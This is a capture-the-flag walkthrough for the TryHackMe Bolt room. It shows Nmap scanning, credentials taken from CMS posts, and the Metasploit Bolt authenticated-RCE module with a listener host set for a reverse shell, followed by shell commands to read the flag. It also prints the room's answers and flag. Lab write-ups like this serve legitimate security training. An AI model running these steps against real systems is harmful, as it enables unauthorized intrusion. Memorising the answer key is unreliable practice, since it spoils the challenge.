TryHackMe Bolt CTF Walkthrough
CTF Challenges

TryHackMe Bolt CTF Walkthrough

Master advanced techniques and methodologies in ctf challenges

Dec 18, 2025
12 min read
AlphaSploit Team
CTF Challenges

Introduction

The Bolt CTF is a beginner-friendly challenge on TryHackMe that focuses on web exploitation and basic penetration testing skills. This walkthrough will guide you through each step of compromising the target machine.

This room is designed for users to get familiar with the Bolt CMS and how it can be exploited using Authenticated Remote Code Execution.

Reconnaissance

Let's start by enumerating the services running on the machine with Nmap:

sudo nmap -sC -sV 10.10.163.6

-sC: Runs Nmap's default scripts (NSE default category). Useful for quick enumeration. -sV: Detects service versions running on open ports.

22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
8000/tcp open  http    (PHP 7.2.32-1)

Nmap reveals 3 open ports, and Bolt CMS is running on port 8000.

Question 1: What port number has a web server with a CMS running?

Answer: 8000

Web Application Analysis

Browsing the CMS on port 8000 reveals a message from Jake Admin that discloses his username:

Hello Everyone,

Welcome to this site, myself Jake and my username is bolt. I am still new to this CMS so it can take awhile for me to get used to this CMS but believe me i have some great content coming up for you all!

Regards,
Jake:Admin

Question 2: What is the username we can find in the CMS?

Answer: bolt

Question 3: What is the password we can find for the username?

In another post, the password is also revealed:

Message for IT Department

Hey guys,

i suppose this is our secret forum right? I posted my first message for our readers today but there seems to be a lot of freespace out there. Please check it out! my password is boltadmin123 just incase you need it!

Regards,
Jake Admin

Answer: boltadmin123

Exploitation

Let's authenticate against the admin interface at http://10.10.177.138:8000/bolt/login with the credentials gathered previously.

Question 4: What version of the CMS is installed on the server?

The version is disclosed in the bottom left corner.

Answer: bolt 3.7.1

Question 5: There's an exploit for a previous version of this CMS

Using searchsploit, we can find an "Authenticated Remote Code Execution" exploit:

searchsploit bolt

Answer: 48296

Question 6: Metasploit exploit path

Answer: exploit/unix/webapp/bolt_authenticated_rce

Gaining Shell Access

msfconsole -q
use exploit/unix/webapp/bolt_authenticated_rce
set rhost 10.10.13.119
set username bolt
set password boltadmin123
set lhost 10.8.50.72
exploit

Privilege Escalation

After getting shell access, search for the flag:

SHELL=/bin/bash script -q /dev/null
whoami
cd /home
ls -la
cat flag.txt

Question 7: Look for flag.txt inside the machine

Answer: THM{wh0_d035nt_l0ve5_b0l7_r1gh7?}

Conclusion

This CTF demonstrates the importance of:

  • Not exposing credentials in public-facing content
  • Keeping CMS software up to date
  • Proper access controls and authentication

Continue Learning

Next ArticleView All Posts